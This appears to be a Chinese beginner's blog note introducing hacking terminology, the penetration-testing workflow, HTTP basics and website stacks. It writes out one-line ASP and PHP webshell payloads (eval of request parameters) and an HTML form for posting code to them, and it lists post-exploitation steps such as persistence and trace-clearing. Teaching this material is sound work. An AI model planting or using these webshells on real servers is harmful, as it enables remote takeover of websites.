基础部分-科普
黑客
- Hacker音译出来的,做的不是恶意破坏,是技术人员
骇客
- 做坏事的人
红客
- 中国特色的技术人员
白帽子
- 专门研究从事网络安全行业的人
黑帽子
- 专门研究木马,操作系统,寻找漏洞,并且人为意志攻击网络或者计算机
灰帽子
- 专门研究木马,操作系统,寻找漏洞,并且人为意志攻击网络或者计算机
专业术语
1,脚本
-asp,php,jsp
2,html
- css,js,html
3,HTTP协议
- 网络传输的协议
4,CMS(B/S)
5,MD5
- 一种信息加密的方式
肉鸡
- 被黑客入侵并被长时间驻扎的计算机或者服务器
抓鸡
- 利用使用量大的程序的漏洞,使用自动化方式获取肉鸡的行为
Webshell
- 通过Web入侵的一种脚本工具,可以据此对网站服务进行一定程度的控制
漏洞
- 硬件,软件,协议等等的可利用的安全缺陷,可能被攻击者利用,对数据进行篡改,控制等。
一句话-木马
- 通过向服务端提交一句简短的代码,配合本地客户端实现webshell功能的木马
<%eval request("pass")%>
<%execute(request("pass"))%>
request("pass")接受客户端提交的数据,pass为执行命令的参数值
eval/execute 函数执行客户端命令的内容
- 如PHP的一句话木马
- <?php eval($_POST[canshu]);?>
- 下面的代码可以用POST的方式提交PHP语句,利用PHP脚本的各种函数,就可以实现执行系统命令,修改数据库,增删改查文件等等的各种功能
- <form method=post action=http://木马地址>
<textarea name=canshu>
//这里写php代码
phpinfo();
</textarea>
<input type=submit>
</form>
提权
- 操作系统低权限的账户将自己提升为管理员权限使用的方法
后门
- 黑客为了对主机进行长期的控制,在机器上种植的一段程序或留下的一个“入口”
跳板
- 使用肉鸡IP来实施攻击其他目标,以便更好的隐藏自己的身份信息
旁站入侵
- 即同服务器下的网站入侵,入侵之后可以用通过提权跨目录等手段拿到目标网站的权限。常见的旁站查询工具有:webrobot,御剑,明小子和web在线查询等
C端入侵
- 即同C段下服务器入侵,如目标IP为192.168.1.253入侵192.168.1.*的任意一台机器,然后利用一些黑客工具嗅探获取在网络上传输的各种信息,常用的工具有:windows下有Cain,在unix环境下有sniffit,snoop,tcpdump,dsniff等等。
渗透测试
- 黑盒测试:在未授权的情况下,模拟黑客的攻击方法和思维方式,来评估计算机网络系统可能蔡遵的安全风险
- 黑盒测试不同于黑客入侵,并不等于黑站。黑盒测试考验的是综合的能力(OS,Datebase,Script,code,思路,社工)
- 思路与经验积累往往决定成败
- 三个臭皮匠赛过诸葛亮
- 白盒测试:相对黑盒测试,白盒测试基本是从内部发起
- 黑白盒的另一种说法,知道源代码和不知道源代码的渗透测试,这时,黑盒测试还是传统的渗透测试,而白盒测试就偏向于代码审计
- APT攻击:Advanced Persistent Threat,高级可持续性攻击,是指组织(特别是政府)或者小团体利用先进的攻击手段对特定目标进行长期持续性网络攻 击的攻击形式。
1极强的隐蔽性
2.潜伏期长,持续性强
3.目标性强
- 渗透测试的特点
充满挑战与刺激---不达目的不罢休
思路与经验累积往往决定成败
三个臭皮匠赛过诸葛亮
渗透测试的流程
渗透测试
-更全面地找出服务 的问题,更倾向于保护。
入侵
-不摔手段地(甚至是具有破坏性的)拿到权限。
明确目标 信息收集 漏洞探测 漏洞验证 信息分析 获取所需 信息整理 形成报告
明确目标
- 确定范围
- 确定规则
- 确定需求
信息采集
- 基础信息
- 系统信息
- 应用信息
- 版本信息
- 服务信息
- 人员信息
- 防护信息
漏洞探测
- 系统漏洞
- WebServer漏洞
- Web应用漏洞
- 其他端口服务漏洞
- 通信安全
漏洞验证
- 自动化验证
- 手工验证
- 试验验证
- 登陆猜解
- 业务漏洞验证
- 公开资源的利用
信息分析
- 精准打击
- 绕过防御机制
- 定制攻击路径
- 绕过检测机制
- 攻击代码
获取所需
- 实施攻击
- 获取内部信息
- 进一步渗透
- 持续性存在
- 清理痕迹
信息整理
- 整理渗透工具
- 整理收集信息
- 整理漏洞信息
形成报告
- 按需整理
- 补充介绍
- 修补建议
经验分享
- 息搜集是关键
- 做事不要太心急
- 多学习,多看源码
- 平时注意搜集Oday
- 思路很重要
学会安装虚拟机VMware和虚拟机安装各种系统
- windows
- windows 2003
- windows 2006
- windows 7
- windows xp
- windows 10
- linux
- ubuntu
- centos
- debian
常用的一些快捷键
- Win+R 运行
- ncpa.cpl 快速打开网络适配器
- cmd 快速打开命令窗口
- ipconfig 快速查看网卡配置信息
网站篇
http讲解
http协议
-超文本传输协议
-(HТТP,HyperText Transfer Protocol)是互联网上应用最为广泛的一种网络协议。所有的WwW文件都必须遵守这个标准。设计HTTP最初的目的是为了提供一种发布和接收HTML页面的方法
http头讲解
- 200响应码
- date日期
- content-type类型
- Accept-Charset:浏览器可接受的字符集。
- Content-Length:表示请求消息正文的长度。
- Cookie:这是最重要的请求头信息之一
- http://www.mrgod.cn
- 例子
-# curl -I www.baidu.com
HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Connection: keep-alive
Content-Length: 277
Content-Type: text/html
Date: Thu, 12 Dec 2019 03:13:59 GMT
Etag: "575e1f5c-115"
Last-Modified: Mon, 13 Jun 2016 02:50:04 GMT
Pragma: no-cache
Server: bfe/1.0.8.18
静态网站
- 静态网站是指全部由HTML(标准通用标记语言的子集)代码格式页面组成的网站所有的内容包含在网页文件中。网页上也可以出现各种视觉动态效果,如GIF动画FLASH动画、滚动字幕等,而网站主要是静态化的页面和代码组成,一般文件名均以htmhtml shtm等为后缀
动态网站
- 动态网站并不是指具有动画功能的网站,而是指网站内容可根据不同情况动态变更的网站,一股情况下动态网站通过数据库进行架构。动态网站除了要设计网页外,还要通过数据库和编程序来使网站具有更多自动的和高级的功能。动态网站体现在网页一般是以asp,jsp,php,aspx等结束,而静态网页一股是HTML(标准通用标记语言的子集)结尾,动态网站服务器空间配置要比静态的网页要求高,费用也相应的高,不过动态网页利于网站内容的更新,适合企业建站。动态是相对于静态网站而言。
网站搭建
- 1 Windows+iis+asp+access
- 2 windows+iis +asp +mssgl
- 1.Windows+asp小旋风+asp+access
- 1 windows+apmserv+php+mysql
- 2 windows+tomcat+ jsp +mysql
- 1 linux+apche+php+mysal
阅读全文
评论前必须登录!
立即登录 注册